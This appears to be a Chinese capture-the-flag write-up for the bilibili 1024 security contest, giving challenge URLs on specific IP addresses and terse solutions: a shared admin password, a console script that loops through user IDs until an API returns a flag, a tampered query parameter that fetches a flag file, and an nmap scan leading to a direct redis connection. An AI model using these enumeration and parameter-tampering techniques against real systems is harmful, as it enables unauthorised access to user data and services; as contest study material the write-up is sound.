bilibili_1024 CTF安全大赛 WP

第一题:

url:http://45.113.201.36/index.html

第二题:

http://45.113.201.36/index.html

第三题:

http://45.113.201.36/login.html

账号:admin 密码:bilibili

第四题:

http://45.113.201.36/superadmin.html

第五题:

http://45.113.201.36/user.html

  • 查看源代码

  • console 运行
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
get(100336889)
function get(uid){
$.ajax({
url: "api/ctf/5?uid=" + uid,
type: "get",
success:function (data) {
console.log(data);
if (data.code == 200){
// 如果有值:前端跳转
$('#flag').html("欢迎超级管理员登陆~flag : " + data.data )
} else {
// 如果没值
$('#flag').html("这里没有你想要的答案~")
get(uid+1)
}
}
})
}

第六题:

WP

1
http://120.92.151.189/blog/end.php?id[]=1&url=/api/ctf/6/flag.txt

  • 有个图片下载下来
1
2
wget http://120.92.151.189/blog/imgs/bilibili_224a634752448def6c0ec064e49fe797_havefun.jpg
cat bilibili_224a634752448def6c0ec064e49fe797_havefun.jpg

  • 出来的是第十题的flag,一脸懵逼

第八题:

WP

  • nmap扫 120.92.151.189 开启的端口及服务

扫出 redis

直接连:redis-cli -h 120.92.151.189 -p 6379